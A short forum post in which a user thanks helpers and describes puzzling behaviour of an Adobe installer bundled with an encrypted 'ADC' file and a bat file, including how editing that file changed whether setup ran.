Thanks @nbrane for a little more insight and understanding of the activity running. Also thanks to @Hackoo for the previous messages. I'll make a post at that link, nbrane; I have to admit this is just out of my skill range. I just don't get why the ADC file needs to be encrypted other than to hide its source code. Also, I tried to delete the bat file and ADC and then install Adobe, but setup.exe disappeared when I double-clicked it. Then I didn't delete the bat file or the ADC file, I just edited the ADC code (messed up the code) and ran setup.exe. It installed normally then.. weird..

